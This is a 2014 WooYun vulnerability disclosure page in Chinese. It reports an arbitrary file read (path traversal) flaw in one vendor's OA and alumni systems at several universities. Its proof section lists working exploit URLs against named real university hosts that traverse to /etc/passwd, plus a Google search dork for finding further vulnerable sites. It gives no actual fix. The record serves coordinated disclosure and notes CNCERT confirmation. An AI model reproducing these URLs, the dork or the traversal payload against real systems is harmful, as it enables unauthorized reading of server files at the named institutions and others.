当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058143

漏洞标题:某厂商通用型任意文件读取漏洞(至少影响该厂商两套以上系统)

相关厂商:cncert国家互联网应急中心

漏洞作者: wefgod

提交时间:2014-04-23 11:35

修复时间:2014-07-23 18:40

公开时间:2014-07-23 18:40

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-23: 细节已通知厂商并且等待厂商处理中
2014-04-28: 厂商已经确认,细节仅向厂商公开
2014-05-01: 细节向第三方安全合作伙伴开放
2014-06-22: 细节向核心白帽子及相关领域专家公开
2014-07-02: 细节向普通白帽子公开
2014-07-12: 细节向实习白帽子公开
2014-07-23: 细节向公众公开

简要描述:

测了一套xx网和他的oa,都存在同样的问题。暂时还不知道该公司是否还有其它系统(懒得找了),但是最低限度也影响了两套系统了。

详细说明:

厂商:

北京希尔信息技术有限公司 http://www.heerit.com/dxanli.htm


搜索:

http://www.google.de/#filter=0&newwindow=1&q=inurl:/forget_password.jsp+%22%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%22


image127.png


主要影响的目前发现是OA和校友网。

漏洞证明:

如下面这套OA:

image128.png


http://oa.bnu.edu.cn/bnuoa/vfs?path=../../../../../../../../../../etc/passwd

image130.png


下面这套还是OA:
http://oa.lit.edu.cn/litoa/vfs?path=../../../../../../../../../../etc/passwd

image131.png


接着还是OA:
http://oa.ccucm.edu.cn/oa/vfs?path=../../../../../../../../../../etc/passwd

image133.png


下面这个还是OA:
http://www.biem.edu.cn/biemoa/vfs?path=../../../../../../../../../../etc/passwd

image134.png


还有其它几个OA:
http://oa.sqmc.edu.cn/sqoa/vfs?path=../../../../../../../../../../etc/passwd

image136.png


还有如http://oa.swpu.edu.cn/swpuoa/
这些OA,不再举例。
下面这套校友系统也受影响:

image137.png


http://alumni.blcu.edu.cn/xy/vfs?path=../../../../../../../../../../etc/passwd

image139.png


另一个校友网:
http://portal.ccpc.edu.cn/ccpcxy/vfs?path=../../../../../../../../../../etc/passwd

image141.png


image143.png


还有另外一个:
http://xyh.bnu.edu.cn/bnuxy/vfs?path=../../../../../../../../../../etc/passwd

image144.png


修复方案:

通用可以证明了吧……

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-28 09:28

厂商回复:

CNVD确认并在多个实例上复现所述情况(由上海交通大学网络信息中心协助验证,未进行巡检),已经转由CNCERT向教育网应急组织赛尔网络公司通报,抄报CCERT。

最新状态:

暂无